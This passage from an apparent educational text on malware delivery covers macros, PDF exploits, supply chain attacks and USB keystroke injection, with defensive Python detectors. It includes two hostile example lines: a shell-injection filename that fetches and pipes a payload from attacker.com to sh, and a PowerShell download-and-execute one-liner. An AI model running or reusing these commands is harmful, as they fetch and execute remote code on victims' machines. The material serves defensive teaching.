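    return digest.hexdigest()

def verify_download(path: Path, published_sha256: str) -> bool:
    """True only if the file's SHA-256 matches the value the vendor published."""
    return sha256_of(path) == published_sha256.strip().lower()

# Usage with a hypothetical installer file
with tempfile.TemporaryDirectory() as tmp:
    installer = Path(tmp) / "installer.bin"
    installer.write_bytes(b"original installer")
    published = hashlib.sha256(b"original installer").hexdigest()  # stands in for the vendor's value
    print(verify_download(installer, published))   # True
    installer.write_bytes(b"original installer + trojan")
    print(verify_download(installer, published))   # False: file was modified
```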

File-Based Infection

Traditional file-based delivery methods involve malware attaching to or disguising itself as files that users might share or execute.

File Infector Viruses

Classic file infector viruses modify executable programs by inserting their code into the file. When a user runs the infected program, the virus code executes first, then transfers control to the original program so everything appears normal. The virus looks for other executable files to infect, perpetuating the cycle.

This approach is much less common today than in the 1990s and early 2000s. Modern operating systems have better protections. Code signing verifies that executables haven't been modified. Address Space Layout Randomization (ASLR) and other security features make it harder to inject code that will execute correctly. However, file infectors haven't disappeared entirely: they still appear occasionally, particularly targeting older systems or specialized environments.

Infected Installation Media

Software downloaded from untrusted sources may contain malware:

Pirated software is frequently bundled with malware. The economics make sense from an attacker's perspective: people searching for pirated software have already decided to circumvent security measures and are willing to take risks. They expect cracks and keygens to behave oddly or trigger antivirus warnings, so they disable security software and ignore warnings. This makes them ideal targets.

Trojanized installers may appear on download sites filled with misleading "Download" buttons. The legitimate download link might be small and inconspicuous, while large, colorful buttons actually download malware.

Repackaged mobile apps in unofficial app stores may include malware not present in the original applications. This is particularly common on Android, where apps can be installed from sources other than Google Play.

Removable Media and USB Drives

USB drives and other removable media can carry malware that spreads when the drive is connected to other systems.

Autorun attacks were very common in the 2000s. Windows would automatically execute programs specified in an autorun.inf file when removable media was inserted. Malware could spread simply by copying itself to USB drives along with an autorun.inf file. Microsoft eventually disabled this automatic execution in Windows 7 and later, significantly reducing this attack vector.

However, USB drives remain viable attack vectors:

Manual execution still works. Even with autorun disabled, users often open files on USB drives themselves, and malware may give itself an enticing name, such as passwords.txt or financial_report.xlsx, to encourage them.

The USB drop attack exploits curiosity. Attackers leave infected USB drives in parking lots, lobbies, or other public areas. Someone finds the drive and, curious about its contents, plugs it into their computer to see what's on it. Labels on the drive, like "Executive Salary Information" or "Confidential Project Files," increase the likelihood someone will plug it in.

Research has shown remarkably high success rates for USB drop attacks: in some studies, roughly half of the dropped drives were plugged in by the people who found them. This simple, low-tech attack remains effective despite decades of security awareness training telling people not to plug in unknown USB drives.

Data leakage is the reverse concern. USB drives are small and easy to lose. A lost USB drive might contain sensitive data accessible to whoever finds it. From a malware perspective, an attacker who finds a lost USB drive gains insight into the organization and might find credentials, documents, or information useful for targeted attacks.
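Both the autorun trick and the enticing-filename trick leave visible traces on the drive itself, so a defender can inspect a mounted drive before anyone opens files on it. The sketch below uses hypothetical helper names and is not a real product. It reports open= and shellexecute= entries from an autorun.inf in the drive root. It also flags files whose last two extensions pair a document-style extension with an executable one, such as passwords.txt.exe, which Windows displays as passwords.txt when known extensions are hidden. The extension lists are illustrative assumptions.

```python
from pathlib import Path

# Illustrative, not exhaustive, extension lists.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".vbs", ".js", ".lnk", ".ps1"}
DECOY_EXTS = {".txt", ".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".png"}


def autorun_commands(root: Path) -> list[str]:
    """Return the open=/shellexecute= values from an autorun.inf in the drive root."""
    commands = []
    for entry in root.iterdir():
        if entry.is_file() and entry.name.lower() == "autorun.inf":
            for line in entry.read_text(errors="replace").splitlines():
                key, sep, value = line.partition("=")
                if sep and key.strip().lower() in {"open", "shellexecute"}:
                    commands.append(value.strip())
    return commands


def disguised_executables(root: Path) -> list[Path]:
    """Find files like 'report.pdf.exe' whose last two suffixes pair a decoy with an executable."""
    hits = []
    for path in root.rglob("*"):
        suffixes = [s.lower() for s in path.suffixes]
        if (path.is_file() and len(suffixes) >= 2
                and suffixes[-2] in DECOY_EXTS and suffixes[-1] in EXECUTABLE_EXTS):
            hits.append(path)
    return hits
```

Neither check catches malware that simply uses an ordinary executable name, so this is a cheap first filter rather than a substitute for antivirus scanning.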

Document-Based Exploits

Documents seem innocuous. After all, they're just files containing text, images, or data. However, modern document formats are complex and support powerful features that can be abused for malware delivery.

Macro Viruses

Microsoft Office applications include a powerful macro language called Visual Basic for Applications (VBA). Macros are small programs that automate tasks within documents. They can access the file system, make network connections, execute system commands, and generally do anything a regular program can do.

This power made Office applications appealing targets for viruses. The Melissa virus (1999) was a macro virus in Word documents. When opened, it would email itself to the first 50 contacts in the victim's address book. ILOVEYOU (2000) spread in a similar way, emailing itself to everyone in the victim's contacts, although it was a standalone VBScript file attached to email rather than a macro embedded in a document.



Microsoft responded by disabling macros by default and showing security warnings. Modern Office displays a prominent notice: "This workbook contains macros. Do you want to disable macros before opening the file?" Macros must be explicitly enabled by the user.

However, macros remain a common attack vector because attackers have adapted their social engineering:

The malicious document displays a message like: "This document was created in a newer version of Microsoft Office. To view the content, please enable macros." This, of course, is not true. The document wasn't created in a newer version, but users often believe it and click "Enable Macros" without understanding the risk.

Or: "This document is protected. To view the content, please enable macros." Again, users who want to see the content comply.

The displayed message might be the only content in the document, styled to look like an official notice from Microsoft or the organization supposedly sending the document.

Once macros are enabled, the malicious code executes. It typically downloads additional malware from the internet, establishes persistence, and begins the infection process.
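The macro has to be inside the document before the user is coaxed into enabling it, so a mail gateway or analyst can look for it without opening the file in Office. The sketch below assumes the Office Open XML formats. These documents are ZIP archives, and their VBA code is stored in a part named vbaProject.bin. The function name is hypothetical. Legacy binary .doc and .xls files use a different container and are not covered, and dedicated tools such as olevba from the oletools project go much further.

```python
import zipfile
from pathlib import Path


def ooxml_has_vba(path: Path) -> bool:
    """Return True if an Office Open XML file contains a VBA project part.

    OOXML documents (.docx, .docm, .xlsx, .xlsm, ...) are ZIP archives, and macros
    are stored in a part named vbaProject.bin (for example word/vbaProject.bin).
    Legacy binary formats such as .doc and .xls are OLE files and are not handled here.
    """
    if not zipfile.is_zipfile(path):
        return False
    with zipfile.ZipFile(path) as archive:
        return any(name.lower().endswith("vbaproject.bin") for name in archive.namelist())
```

The check looks at the archive contents rather than the file extension because the extension is attacker-controlled.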

Bypassing macro warnings:

Attackers have developed techniques to bypass or work around macro protections:

In 2017, attackers discovered that sending an RTF (Rich Text Format) file with a .docx extension would cause Word to open it despite the format mismatch. They leveraged this to make Word download malicious HTML Application (HTA) content, which would then execute. Microsoft eventually patched this technique.

In 2018, attackers embedded specially crafted settings files into Office documents that would bypass macro warnings when the document was opened.

In 2022, Microsoft announced it would block macros in files downloaded from the internet by default. However, CVE-2022-30190 ("Follina") exploited the Microsoft Support Diagnostic Tool (MSDT) to allow code execution even with macros disabled. Special URLs designed for Microsoft support diagnostics could be embedded in documents, and simply opening or previewing the file would trigger the execution.

Common Office exploits today:

Microsoft Equation Editor: this vulnerability (CVE-2017-11882) was patched in 2017 but remains effective because many users still run old, unpatched versions of Office. It allows code execution without requiring macros or any user action beyond opening the document. The Equation Editor is a component for rendering mathematical equations in Word documents, and a buffer overflow in how it parses equations allows attackers to execute arbitrary code.

Microsoft Support Diagnostic Tool: exploiting this vulnerability (CVE-2022-30190, "Follina") doesn't require macros. Attackers can embed special URLs in documents that trigger MSDT to execute when the file is opened or previewed. The URL format is designed for Microsoft support diagnostics, but can be abused to launch PowerShell scripts that download and execute malware.

Social engineering remains primary. Even with Microsoft's improved macro blocking, attackers continue to trick users into enabling macros through social engineering. They create convincing pretexts—invoices from known vendors, résumés from job applicants, shipping notifications—and users who expect these documents often enable macros without hesitation.

URLs embedded in documents provide an alternative to macros. The file itself isn't malicious but contains a link to a malicious URL. The URL might point to an exploit kit, a phishing page, or a malware download. It might also link to a fake Microsoft 365 or Google Workspace login page designed to steal credentials.
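Links like these, and the remote template used by Follina, are declared in an OOXML document's relationship files (the _rels/*.rels parts). Each declaration is a Relationship element, and external targets carry TargetMode="External". In the published Follina samples, an oleObject relationship reportedly pointed at a remote HTML page. The sketch below lists every external target so that a filter or analyst can check it against reputation data. The function name is hypothetical. It uses the standard library's ElementTree, which the Python documentation warns is not hardened against maliciously constructed XML, so a production scanner would use a hardened parser such as defusedxml.

```python
import xml.etree.ElementTree as ET
import zipfile
from pathlib import Path

# Namespace used by Open Packaging Conventions relationship parts.
REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"


def external_targets(path: Path) -> list[tuple[str, str, str]]:
    """List (rels part, relationship type, target) for every external relationship in an OOXML file."""
    results = []
    with zipfile.ZipFile(path) as archive:
        for name in archive.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(archive.read(name))
            for rel in root.iter(f"{REL_NS}Relationship"):
                if rel.get("TargetMode") == "External":
                    # Keep only the last path segment of the type URI, e.g. 'hyperlink' or 'oleObject'.
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    results.append((name, rel_type, rel.get("Target", "")))
    return results
```

An external oleObject or attachedTemplate relationship in a document that arrived by email deserves far more suspicion than an ordinary hyperlink.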

PDF Exploits

Adobe's Portable Document Format (PDF) is another complex file format that has been heavily targeted.

PDFs are not just page descriptions. The format supports:

- JavaScript that can execute when the document is opened
- Embedded files that can be included within the PDF
- Forms that can submit data to URLs
- Actions that trigger when the document is opened, closed, or when specific elements are clicked
- Network requests that can connect to remote servers

This functionality has been exploited in numerous ways. JavaScript in PDFs can attempt to exploit vulnerabilities in the PDF reader. Embedded files might be executables disguised as documents. Actions can trigger downloads or connect to malicious servers. Forms can submit data to attacker-controlled sites.
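Each of these features is switched on by a PDF name object such as /JavaScript, /OpenAction, or /Launch. A common first triage step, popularized by Didier Stevens' pdfid tool, is therefore to count those names in the raw file. The sketch below is a simplified, hypothetical version of that idea. It decodes the #xx hex escapes that PDF allows inside names, because attackers use them to hide keywords (for example /J#61vaScript). It cannot see names inside compressed object streams, so a zero count does not prove a file is clean.

```python
import re
from collections import Counter
from pathlib import Path

# Name objects tied to the risky features listed above.
RISKY_NAMES = {"/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch",
               "/EmbeddedFile", "/SubmitForm", "/URI"}

# A PDF name is '/' followed by regular characters (delimiters and whitespace end it).
NAME_PATTERN = re.compile(rb"/[^\s/<>\[\]()%{}]+")


def normalize_name(raw: bytes) -> str:
    """Decode '#xx' hex escapes so '/J#61vaScript' is recognized as '/JavaScript'."""
    decoded = re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)
    return decoded.decode("latin-1")


def risky_keywords(path: Path) -> Counter:
    """Count risky name objects visible in the raw (uncompressed) bytes of a PDF."""
    counts = Counter()
    for match in NAME_PATTERN.finditer(path.read_bytes()):
        name = normalize_name(match.group())
        if name in RISKY_NAMES:
            counts[name] += 1
    return counts
```

A document that combines /OpenAction with /JavaScript or /Launch is worth sending to a sandbox before anyone opens it in a reader.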

Modern PDF readers have improved significantly. Adobe Acrobat and other readers now use sandboxing to isolate JavaScript execution and limit what PDFs can do. Protected Mode and other security features restrict file system access and network connectivity. Many organizations configure PDF readers to disable JavaScript entirely.

However, vulnerabilities continue to be discovered. The complexity of the PDF specification means that edge cases and parsing errors can lead to exploitable conditions. With numerous PDF reader applications available (Adobe Acrobat, Foxit, various open-source readers), each with its own implementations and potential vulnerabilities, PDF exploits remain a concern.

Malware in Filenames

An unusual attack vector disclosed in 2025 exploits how command-line interfaces and scripts sometimes handle filenames. If a filename contains shell metacharacters -- special characters that have meaning to the shell -- those characters might be interpreted when the filename is processed.

Consider a filename like:

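ziliao2.pdf`{echo,(curl -fsSL -m180 http://attacker.com/payload||wget -T180 -q http://attacker.com/payload)|sh}`

The backticks (`) tell the shell to execute the enclosed commands. Simply expanding the name in a loop such as for f in * does not run them. The danger comes when a script re-parses the name as shell code without proper sanitization, for instance a backup script that loops with for f in * and then passes each name to eval or splices it into a command string run by sh -c. In that case, the commands within the backticks execute.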

While this attack requires specific conditions to work (scripts that process filenames unsafely), it demonstrates the creativity attackers employ. The malicious file was distributed in .rar archives via spam emails. When extracted and processed by vulnerable scripts, the filename itself became the attack vector.

The payload in this example downloads a malicious script from an attacker-controlled server and executes it. The curl and wget commands provide redundancy: if one isn't available on the system, the other might be. The script establishes a shell connection to the attacker.

This is an example of fileless malware: the malicious commands never exist as a traditional executable file. They're embedded in metadata (the filename) and executed directly by the shell.

The defense is proper input validation and sanitization. Scripts should quote filenames ("$f" rather than $f), never hand them to eval or embed them in strings run by sh -c, build argument lists with arrays rather than concatenated command strings, and validate filenames before processing. However, many existing scripts were written without considering that the filenames themselves could be malicious.
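The same principles apply in any language that launches commands. The sketch below uses Python's standard library and hypothetical helper names. It flags names containing shell metacharacters, quotes a name with shlex.quote when a shell string truly cannot be avoided, and, preferably, passes the name as a separate argument so that no shell ever parses it. The metacharacter set is an illustrative assumption, not a complete list.

```python
import shlex
import subprocess

# Characters that POSIX shells treat specially (illustrative, not exhaustive).
SHELL_METACHARS = set("`$;&|<>(){}[]*?!\\\"'\n")


def is_suspicious_filename(name: str) -> bool:
    """Flag names containing shell metacharacters so they can be quarantined or renamed."""
    return any(ch in SHELL_METACHARS for ch in name)


def quoted_command(command: str, filename: str) -> str:
    """If a shell string is unavoidable, quote the filename so the shell sees one literal word."""
    return f"{command} {shlex.quote(filename)}"


def run_on_file(argv: list[str], filename: str) -> subprocess.CompletedProcess:
    """Preferred: pass an argument list, so no shell ever parses the filename."""
    return subprocess.run([*argv, filename], capture_output=True, text=True, check=False)
```

With the argument-list form, a name like ziliao2.pdf`{echo,...}` reaches the program as inert text, backticks included.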

Supply Chain Attacks

Some of the most damaging malware attacks don't target end users directly. Instead, they compromise the software supply chain -- the process by which software is developed, built, and distributed. A successful supply chain attack allows attackers to inject malware into software that users trust and willingly install.

Why Supply Chains Are Attractive Targets

From an attacker's perspective, supply chain attacks have significant advantages:

Trust: Users trust software from known vendors. They install updates without suspicion and click through security warnings because they recognize the source.

Scale: A single compromise can affect thousands or millions of users who all install the compromised software. One successful attack multiplies into countless infections.

Bypass defenses: Traditional security focuses on the perimeter -- deploying firewalls, email filters, and download scanners. Supply chain attacks circumvent these defenses because the malicious software arrives through trusted channels.

Persistence: Even if the compromise is discovered and fixed, the damage has been done. All systems that installed the malicious version remain infected until specifically cleaned.

Supply Chain Attack Methods

Attackers can compromise the supply chain at various points:

Source code compromise involves attackers gaining access to the source code repository. This might be through stolen credentials, exploitation of the repository hosting service, or insider access. Once in the repository, they insert malicious code directly. When developers build software from this repository, the malicious code is included in the final product.

The challenge for defenders is that the source code looks legitimate. It might be obfuscated or disguised as normal functionality. Code review might miss it, especially in large projects with many contributors.

Build system compromise targets the systems that compile source code into distributable binaries. Even if the source code repository is secure, attackers can inject malicious code into the build process if they control the build servers. The source code remains clean, but the distributed binary contains malware.

Update mechanism compromise targets the system that distributes software updates. Many applications include automatic update functionality that checks for and installs new versions. If attackers compromise the update server or signing keys, they can push malicious "updates" to all installed instances.

Third-party library compromise exploits the fact that modern software depends on numerous libraries and components. An application might include dozens or hundreds of dependencies. If attackers compromise one of these dependencies, all applications that include it become vulnerable.

Package repositories like npm (for JavaScript), PyPI (for Python), and others have been targeted numerous times. Attackers upload malicious packages with names similar to popular legitimate packages (typosquatting) or compromise existing popular packages. Developers who specify the malicious package as a dependency unknowingly include malware in their applications.
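Typosquatting works because a mistyped name is only an edit or two away from the real one, and that distance can be measured. The sketch below normalizes names the way PyPI does (PEP 503 treats runs of "-", "_" and "." as equivalent and ignores case). It then reports popular packages within a small Levenshtein distance of a candidate name. The popular-package list and the threshold are hypothetical placeholders. Registries and commercial scanners combine many more signals, such as package age and maintainer history.

```python
import re

# Hypothetical list; a real check would use the registry's most-downloaded packages.
POPULAR_PACKAGES = ["requests", "numpy", "pandas", "urllib3", "colorama"]


def normalize(name: str) -> str:
    """PEP 503 normalization: runs of '-', '_' and '.' are equivalent, and case is ignored."""
    return re.sub(r"[-_.]+", "-", name).lower()


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance: minimum insertions, deletions, and substitutions to turn a into b."""
    previous = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        current = [i]
        for j, cb in enumerate(b, start=1):
            current.append(min(
                previous[j] + 1,               # delete ca
                current[j - 1] + 1,            # insert cb
                previous[j - 1] + (ca != cb),  # substitute (free if the characters match)
            ))
        previous = current
    return previous[-1]


def likely_typosquats(candidate: str, popular=POPULAR_PACKAGES, max_distance: int = 2) -> list[str]:
    """Popular packages the candidate name is suspiciously close to, without being identical."""
    cand = normalize(candidate)
    return [p for p in popular if 0 < edit_distance(cand, normalize(p)) <= max_distance]
```

For example, likely_typosquats("colourama") points at colorama. A fixed threshold of 2 is too loose for very short names, so a practical tool would likely scale it with name length.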

High-Profile Supply Chain Attacks

SolarWinds (2020) represents one of the most significant supply chain attacks discovered to date. Nation-state attackers (attributed to Russia's SVR) compromised SolarWinds' build system. SolarWinds produces Orion, an IT management platform used by thousands of organizations, including government agencies and Fortune 500 companies.

The attackers inserted a backdoor called "Sunburst" into Orion software updates. Between March and June 2020, approximately 18,000 SolarWinds customers downloaded and installed the compromised update. The backdoor gave attackers access to victim networks, which they used for espionage and data theft.

The attack was incredibly stealthy. The malicious code was carefully crafted to blend with legitimate functionality. It remained dormant for about two weeks after installation to avoid triggering analysis systems. It disguised its command-and-control traffic as the Orion Improvement Program protocol that Orion legitimately uses, making the network traffic appear normal. The backdoor was only activated for a subset of victims: approximately 100 organizations were specifically targeted for further compromise.

The attack wasn't discovered until December 2020, nine months after the malicious update was released. Even after discovery, remediation was complex. Organizations couldn't simply remove the Orion software because they depended on it. They had to determine if they were among the subset of victims that were actually targeted beyond the initial backdoor installation, identify what data might have been accessed, and rebuild systems that might have been compromised.

CCleaner (2017) demonstrates that supply chain attacks aren't limited to enterprise software. CCleaner is a popular PC cleaning utility used by millions of home users. Attackers compromised Piriform, CCleaner's developer (acquired by Avast in 2017), and inserted a backdoor into CCleaner version 5.33. Approximately 2.3 million users downloaded the infected version before it was discovered and removed.

The backdoor collected system information and transmitted it to attacker-controlled servers. For most victims, this was the extent of the compromise. However, the attackers used the collected data to identify high-value targets—technology companies and telecommunications firms. These selected targets received second-stage malware providing full remote access.

NotPetya (2017) was initially thought to be ransomware but was actually a destructive wiper masquerading as ransomware. It spread through a supply chain attack on M.E.Doc, Ukrainian accounting software required by Ukrainian law for companies doing business in Ukraine.

Attackers compromised M.E.Doc's update mechanism and pushed the NotPetya malware as a software update. Once installed, NotPetya appeared to be ransomware—it encrypted files and displayed a ransom demand. However, the encryption implementation was intentionally broken. Even if victims paid the ransom, their files couldn't be decrypted. This was destruction, not extortion.

NotPetya spread beyond its initial targets through multiple mechanisms: the EternalBlue SMB exploit, stolen credentials, and other techniques. While it primarily affected Ukrainian organizations, it spread globally through the networks of multinational companies with operations in Ukraine. Maersk (shipping), Merck (pharmaceuticals), FedEx, and numerous other global companies were affected. Total damages exceeded $10 billion, making it one of the most costly cyberattacks in history.

XZ Utils (2024) illustrates a more insidious form of supply chain attack—a long-term effort to compromise open-source software. XZ Utils is a data compression library used by nearly all Linux distributions.

Starting in 2021, an individual using the identity "Jia Tan" began contributing to XZ Utils. Over several years, this person made legitimate contributions, building trust and credibility in the community. Eventually, they were given commit access and release authority.

In February 2024, Jia Tan added a backdoor to XZ Utils 5.6.0 and 5.6.1. The backdoor was carefully hidden in test files and binary blobs that wouldn't be obvious during code review. When compiled and installed, the backdoor intercepted SSH authentication, potentially allowing the attacker to access any system running the compromised version.

The backdoor was discovered in March 2024 by Andres Freund, a Microsoft developer who noticed unusual behavior while investigating performance issues. By then the backdoored versions had already reached development and testing branches such as Debian unstable and Fedora Rawhide. The discovery came just weeks before they would have shipped in stable releases of major Linux distributions like Debian and Red Hat, putting millions of systems at risk.

This attack demonstrated:

- Long-term commitment: Years of building credibility before attempting the compromise
- Technical sophistication: The backdoor was carefully obfuscated and hidden
- Understanding of open-source development: The attacker knew how to gain trust and authority within the community
- Near miss: The backdoor was found shortly before widespread distribution; had it not been found, the impact would have been enormous

Package Repository Attacks

Modern software development heavily relies on package repositories -- centralized collections of libraries and components that developers can easily include in their projects. These repositories are increasingly targeted by attackers.

PyPI (Python Package Index) has been repeatedly targeted by malware campaigns. In March 2024, PyPI temporarily suspended new user registration after an influx of 566 malicious packages was uploaded in a typosquatting campaign. This wasn't the first time; similar incidents occurred in May 2023, November 2023, and December 2023.

The malicious packages targeted developers. They used names similar to popular packages, hoping developers would make typos when specifying dependencies. They might also appear in search results for popular packages, tricking developers into choosing the wrong package. Once installed, these packages would steal credentials, inject backdoors, or install cryptocurrency miners on developers' systems.

npm (Node Package Manager) for JavaScript has faced similar issues. In November 2024, a campaign targeted hundreds of popular JavaScript libraries with weekly downloads in the tens of millions. Attackers created typosquatted package names similar to legitimate cryptocurrency-related libraries, targeting developers working on blockchain applications.

In March 2024, the "Top.gg" Discord bot community with over 170,000 members was impacted by a supply chain attack. The attacker had been active since November 2022, using tactics including:

- Hijacking GitHub accounts to modify legitimate repositories
- Distributing malicious Python packages through PyPI
- Creating fake Python infrastructure to distribute malware
- Using social engineering to convince developers to install malicious packages

The attack specifically targeted developers with malware designed to steal sensitive information. The sophistication and persistence demonstrated advanced planning and execution.

GitHub repository attacks represent another vector. In March 2025, an attack targeted one of Coinbase's open-source projects. Attackers compromised the "tj-actions/changed-files" GitHub Action (a component used in automated development workflows) to inject code that would steal secrets from repositories using this workflow. Tens of thousands of repositories depended on this Action, potentially exposing sensitive credentials and API keys.
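A version tag such as v45 is a movable pointer. A workflow that references an Action by tag therefore runs whatever commit the tag points to at run time. GitHub's security hardening guidance recommends pinning third-party Actions to a full-length commit SHA instead. The sketch below is a hypothetical line-based linter that flags uses: references not pinned that way. It skips local actions and docker:// images, and it does not parse YAML properly, so unusual formatting could slip past it.

```python
import re

# Matches lines such as "  - uses: owner/repo@ref" or "    uses: 'owner/repo@ref'".
USES_LINE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^'\"\s#]+)")
FULL_SHA = re.compile(r"^[0-9a-f]{40}$")


def unpinned_actions(workflow_text: str) -> list[str]:
    """Return 'uses:' references that are not pinned to a full 40-character commit SHA."""
    findings = []
    for line in workflow_text.splitlines():
        match = USES_LINE.match(line)
        if not match:
            continue
        ref = match.group(1)
        if ref.startswith(("./", "docker://")):
            continue  # local actions and container images are out of scope here
        _, _, version = ref.partition("@")
        if not FULL_SHA.match(version):
            findings.append(ref)
    return findings
```

Pinning to a SHA does not make an Action trustworthy. It guarantees only that the reviewed code is the code that runs, so updates still need review.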

Defending Against Supply Chain Attacks

Supply chain security is challenging because it requires securing not just your own systems but also those of every vendor and dependency you rely on.

For organizations:

Vendor security assessment evaluates the security practices of software vendors before purchasing or deploying their products. This includes reviewing their development practices, security certifications, incident response history, and contractual security requirements.

Minimizing dependencies reduces attack surface by limiting the number of third-party components included in applications. Each dependency is a potential vulnerability, so fewer dependencies mean fewer risks.

Dependency monitoring tracks all components included in applications and watches for security advisories affecting those components. Tools can automatically check if any dependencies have known vulnerabilities.

Build verification ensures that built software matches source code and that build processes haven't been compromised. Reproducible builds allow verification that distributed binaries were created from specific source code.

Network segmentation limits damage if a supply chain attack succeeds. Systems that don't need to communicate with each other shouldn't be on the same network segment.

For developers:

Verify package integrity by checking signatures or checksums when installing dependencies. Package managers often support signature verification to confirm packages haven't been tampered with.

Pin specific versions rather than using wildcard version specifications. Instead of "install the latest version," specify exact versions. This prevents automatic installation of compromised updates.

Review dependencies before adding them to projects. Check the package's maintainer, download statistics, age, and whether it's actively maintained. Be suspicious of packages with few downloads, newly created packages, or packages with typo-similar names to popular packages.

Use private repositories for internal development, pulling only vetted packages from public repositories.

Automated scanning can detect known malicious packages or suspicious code patterns. Tools exist that scan dependencies for security issues, though they're not foolproof against sophisticated supply chain attacks.
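Version pinning tends to erode quietly as dependencies are added in a hurry. A small check in continuous integration can catch this. The sketch below is a hypothetical linter for pip requirements files. It treats only == or === with a wildcard-free version as pinned, and it skips comments and pip options. It is not a full requirements parser. pip's own hash-checking mode (--require-hashes) goes further by also verifying each downloaded file's hash.

```python
import re

# An exact pin: name, optional [extras], '==' or '===', a version without wildcards, optional '; marker'.
EXACT_PIN = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*(\[[^\]]*\])?\s*===?\s*[^\s;,*]+\s*(;.*)?$")


def unpinned_requirements(text: str) -> list[str]:
    """Return requirement lines that do not pin an exact version."""
    findings = []
    for raw in text.splitlines():
        line = re.sub(r"(^|\s)#.*$", "", raw)                    # drop comments
        line = line.split(" --", 1)[0].rstrip("\\ \t").strip()  # drop per-line options like --hash
        if not line or line.startswith("-"):
            continue  # blank lines and pip options such as -r, -e, --index-url
        if not EXACT_PIN.match(line):
            findings.append(line)
    return findings
```

Ranges such as >=1.26 and prefix matches such as ==4.2.* are reported, because either one lets a newly published (and possibly compromised) release in automatically.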

The challenge is that supply chain security requires vigilance at every point in the development and distribution process. A single compromised component or trusted system can undermine all other security measures.

Physical Attack Vectors

While most malware discussion focuses on network-based delivery, physical access to systems remains a significant threat. Physical attacks bypass network defenses entirely and can be devastatingly effective.

Infected Removable Media

USB drives, external hard drives, SD cards, and other removable media can carry malware. The USB drop attack mentioned earlier—leaving infected drives for people to find and plug in—remains remarkably effective despite being simple and well-known.

Research studies on USB drop attacks have found:

- 48% of dropped drives were picked up and plugged in within hours
- Higher rates when drives were labeled with enticing names ("Confidential," "Executive Salaries," "Private Photos")
- People plugged in drives even when warned about USB security risks
- Curiosity and the desire to return lost property (paradoxically, good intentions) motivated many people to plug in drives

The attack works because it exploits human psychology rather than technical vulnerabilities. Even security-conscious individuals might plug in a drive intending to identify the owner without realizing the risk.

USB Attacks Beyond Storage

Not all USB devices are what they appear to be. While a USB flash drive stores files, USB devices can present themselves as various types of devices—keyboards, network adapters, cameras, and more. This flexibility enables sophisticated attacks.

BadUSB refers to attacks that reprogram the firmware of USB devices to present false identities. A USB flash drive might identify itself to the computer as a keyboard and a storage device simultaneously. When plugged in, the "keyboard" component injects malicious commands while the storage component appears normal.

The attack works at the firmware level. Scanning the "files" on a BadUSB device with antivirus won't detect the malicious code because it's in the device's firmware, not in files. The operating system trusts USB devices and accepts their self-reported identity without verification.

Defending against BadUSB is challenging. The attack is invisible to traditional security software. Hardware solutions (USB port blockers, devices that only allow charging but not data) provide some protection. Policies requiring authentication before USB devices can be used help in corporate environments. But for users who need to use USB devices regularly, the risk remains.
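The operating system cannot verify a device's claims, but it can at least show what each device claims to be. On Linux, the kernel exposes every USB interface under /sys/bus/usb/devices (entries such as 1-2:1.0), each with a bInterfaceClass file. The sketch below, with hypothetical function names, groups interfaces by device and flags devices that present both a HID interface (class 0x03, keyboards and mice) and a mass-storage interface (class 0x08), the combination described above. Some legitimate composite devices also match. A pure keystroke injector that presents only a keyboard would not be flagged.

```python
from collections import defaultdict
from pathlib import Path

HID_CLASS = 0x03           # USB interface class: Human Interface Device (keyboards, mice)
MASS_STORAGE_CLASS = 0x08  # USB interface class: Mass Storage
SYSFS_USB = Path("/sys/bus/usb/devices")


def interface_classes(sysfs_root: Path = SYSFS_USB) -> dict[str, set[int]]:
    """Map each USB device (e.g. '1-2') to the set of interface classes it exposes."""
    classes: dict[str, set[int]] = defaultdict(set)
    for iface in sysfs_root.glob("*:*"):  # interface entries look like '1-2:1.0'
        class_file = iface / "bInterfaceClass"
        if class_file.is_file():
            device = iface.name.split(":", 1)[0]
            classes[device].add(int(class_file.read_text().strip(), 16))
    return dict(classes)


def keyboard_plus_storage(sysfs_root: Path = SYSFS_USB) -> list[str]:
    """Devices that claim to be both an HID device and a storage device."""
    return sorted(dev for dev, found in interface_classes(sysfs_root).items()
                  if {HID_CLASS, MASS_STORAGE_CLASS} <= found)
```

Because the root path is a parameter, the check can be tested against a fake directory tree or pointed at the real sysfs on a Linux host.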

USB Rubber Ducky is a commercial keystroke injection tool designed for penetration testing but often used maliciously. It looks like an ordinary USB flash drive, but acts as a keyboard when plugged in.

Here's how an attack proceeds:

- The device is plugged into an unlocked computer (often while the user is away from their desk momentarily)
- The computer detects a new keyboard and accepts input from it
- The Rubber Ducky injects keystrokes at superhuman speed -- faster than humans can type and faster than most people can react
- These keystrokes open command prompts or PowerShell, download malware from the internet, execute commands, and clean up evidence
- The entire attack completes in a few seconds
- The device is removed, leaving no obvious trace

An example payload might:

Win+R (open the Run dialog)

powershell -w hidden -Command "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"

Enter

This opens PowerShell in hidden mode, downloads a script from the attacker's server, executes it, and closes, all within seconds. By the time the user returns to their desk, the attack is complete and the window has closed.

Side-channel data exfiltration

The Rubber Ducky can also be used for data exfiltration through a clever side-channel attack. The device can encode data by manipulating keyboard LED indicators (Caps Lock, Num Lock, Scroll Lock). When a key that toggles an LED is pressed on one keyboard, the LED illuminates on all attached keyboards. The Rubber Ducky can:

- Have malware on the target system encode data as LED blink patterns
- "Listen" for these patterns by watching the lock-key LED state updates the host sends to every attached keyboard
- Decode the data and store it in the Rubber Ducky's memory
- Be removed with the stolen data, leaving logs that show only a keyboard was attached and never a USB storage device
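To make the idea of encoding data as lock-key toggles concrete, the sketch below shows one possible scheme. It is an assumption for illustration, not the encoding any particular product uses: a Caps Lock toggle means bit 1, a Num Lock toggle means bit 0, and a Scroll Lock toggle marks the end of the message. The "malware" half turns bytes into toggles. The "device" half turns the observed toggles back into bytes.

```python
# Hypothetical mapping: one lock-key toggle per bit, Scroll Lock as the end marker.
BIT_KEYS = {"1": "CAPSLOCK", "0": "NUMLOCK"}
END_KEY = "SCROLLLOCK"


def encode(data: bytes) -> list[str]:
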